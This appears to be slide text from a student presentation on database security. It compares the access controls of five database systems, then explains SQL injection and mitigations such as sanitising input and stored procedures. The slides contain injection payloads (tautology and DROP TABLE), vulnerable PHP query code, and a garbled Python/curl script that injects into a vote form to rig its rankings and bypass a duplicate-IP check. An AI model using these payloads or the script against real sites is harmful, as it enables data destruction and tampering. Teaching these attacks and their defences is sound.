Database Security

Types of attacks and mitigation strategies

Group Members:

Tushar Sugandhi

Natthapol Prakongpan

Travis Whilden

Brendan Kohlar

Jonathan Reitnauer

Database Access Control

Part I

Review Databases

• IBM DB2

• Oracle

• Microsoft SQL Server

• MySQL

• PostgreSQL

Security Mechanisms

• Authentication– Who is allowed access to the instance and/or database– Where and how a user's password will be verified

• Authorization– The authority level that a user is granted– The commands that a user is allowed to run– The data that a user is allowed to read and/or alter– The database objects a user is allowed to create, alter,

and/or drop• Privileges

– Granular authorization

IBM DB2 Authentication

– Works closely with the security features of the underlying operating system to verify user IDs and passwords.

– Can use Kerberos to authenticate users.

IBM DB2 Authorization

• Determine the operations that users and/or groups can perform.

• Determine the data objects that users can access.

• Five authority levels:– SYSADM– SYSCTRL– SYSMAINT– DBADM– LOAD

IBM DB2 Privileges

• More granular then authorities.

• Can be assigned to users and/or groups.

• Help define the objects that a user can create or drop.

• Help define the commands that a user can use to access objects (tables, views, indexes, packages).

Oracle Security

• Authentication (Identity Management)

• Virtual Private Database

• Oracle Label Security– Row Level Authentication

Oracle Identity Management

• LDAP Directory Service

• Directory integration and provision services

• Authentication and authorization services

• Certificate authority (CA)

Oracle Virtual Private Database

• Allow policy to be associated with specific columns in tables.

• Relevant Column and Masking

Oracle Label Security

• Provides a secure engine and data dictionary for managing access to data using sensitivity label.

• Row level security can be achieved with no programming required.

• Sensitivity labels are used to determine user’s ability to view and update data.

Oracle Label Security

Microsoft SQL Server

• Authentication

• Access Permission

• Roles

MS SQL Authentication

• Two methods for user authentication

• Windows authentication– Default and preferred– Secure authentication with underlying

operating system

• SQL Server authentication– Strongly discourage– Not as secure (Clear text password)

MS SQL Access Permission

• Statement Permissions

MS SQL Access Permission

• Object Permissions

MS SQL Roles

MySQL

• Limited Security Features

• Authentication

• Permission

MySQL Authentication

• User table/grant table in master database.

• Stored in plaintext.

• Can be view by anyone if not configured properly.

• No ties to OS.

• MySQL’s root has no password by default.

MySQL Permission

• Table level control

• Column level control

• No row level control

Postgre SQL Authentication

• Trust Authentication– OS-based

• Password Authentication– md5, crypt, or password through a user table

• Kerberos Authentication– Kerberos auth. server

• Ident-based Authentication– Username, password, machine, OS.

• Pluggable Authentication Module (PAM)– Custom authentication method.

Postgre SQL Permission

• Read– SELECT

• Append– INSERT

• Write– UPDATE/DELETE

• Rules– Allows a user to modify permission on a database.– Super user

Features Comparison

DB2 Oracle MS SQL MySQL Postgre

Authentication Multiple

Good

Multiple

Good

OS

No Option

User Table

Poor

Multiple

Good

Permission Good Good Good Poor Good

Row Level View Native View View View

SQL INJECTION ATTACKS

THE BASICS

Part II

What is SQL Injection?

• A security vulnerability exploiting the application layer of the database

• Improperly handled user input injected into DBMS as SQL statements

Where is it Done?

• Potentially any field requiring user input!– Attacking either the user handle or password in

login authentication is most commonly associated location of SQL Injection

Specifically…

• SQL Injection attacks can be broken down into the exploitation of two vulnerabilities– Improper removal of escape characters– Weak type enforcement

Vulnerability:Escape Characters• When escape characters used in SQL

query/command are not properly filtered from user input– Triggers an escape sequence from the current

query, such as setting a dummy value equal to itself

• The statement ‘X = X’ is always true

Example: Escape Characters Exploit• Application prompts user for userName:

– statement := "SELECT * FROM users WHERE name = '" + userName + "';“

• User injects partial SQL code into prompt:– a' or 't'='t

• statement becomes:– SELECT * FROM users WHERE name = 'a' or 't'='t';

• Or condition always returns true

Vulnerability:Weak Type Enforcement• When type constraints are not properly

implemented for user input– Malicious user injects a data type for input that

was not an intended value

Example:Weak Type Enforcement Exploit

• Application prompts user for numeric value for row selection for following code:

– statement := "SELECT * FROM data WHERE id = " + a_variable + ";“

• User injects string statement into prompt:– 1;DROP TABLE users

• statement becomes:– SELECT * FROM data WHERE id = 1;DROP TABLE users;

• Execution deletes users table from database

Protection From Attack

• Sanitize the data

• Secure the application

• Safeguard the input

• Use stored procedures

Protection:Sanitize the Data• More than simply adding backslashes!

– Need a default-deny regular expression to filter through only desired characters:

• s/[^0-9a-zA-Z]//\ returns only alphanumeric values

– Strip quotation marks

Protection:Secure the Application• People are the weakest link

– Limit access to only those who need it!– Set each individual’s access to lowest required

permissions

Protection:Safeguard the Input• Check your database interface for input

handling functions– Proper quote handling in string parsing– Deal with backslashes accordingly

Protection:Use Stored Procedures• A viable alternative…

– Resolves issues with dynamic input– Tailored to the specific needs of the database

DEMO

Part III

SQL Injection Demo

Attack a real website using SQL injection

SQL Injection Demo

• Bestthing.info: Comparing apples to oranges and oranges to racecars.

• User-driven content with database backend

• Quest to find the “best thing ever”

• Mirror of the site at injection.pycoder.net

Plan of attack

• Put a phrase at the top of the “Best” phrases

• Must get around the protection against duplicate ip addresses.

Site CodeHTML:<form method="post" action="/"> <div> <input name="tid0" value="27356" type="hidden" /> <input name="tid1" value="35705" type="hidden" /> <input name="A" type="submit" value="Having a funny hat" /> or <input name="B" type="submit" value="Bs" /> <br /><br /> <input type="submit" name="d" value="Report this pair as a duplicate." /> </div></form>

PHP:mysql_query('INSERT INTO votes (ip,time,tid0,tid1,vote) VALUES ('.ip2long($_SERVER['REMOTE_ADDR']).',now(),'.$_POST['tid0'].','.$_POST['tid1'].','.(isset($_POST['A'])?1:0).')');if(mysql_affected_rows()>0) { mysql_query('UPDATE thing SET votesFor=votesFor+'.$forA.', votesTotal=votesTotal+1 WHERE tid='.$o); mysql_query('UPDATE thing SET votesFor=votesFor+'.($forA?0:1).', votesTotal=votesTotal+1 WHERE tid='.$t); }

Attack Code

Python Script:

#!/usr/bin/pythonimport random, commandsx = [random.randint(4000,400000)]for n in range(600): while True: p = random.randint(4000,400000) If not p in x: x.append(p) break commands.getoutput((r"curl -d tid0=%i,%i,1\)\ # -d tid1=-1\ or\”+ r“thing=\'test\' -d B=submit ”+ r“http://injection.pycoder.net" ) % (x[-2],x[-1]))

Thank you !!!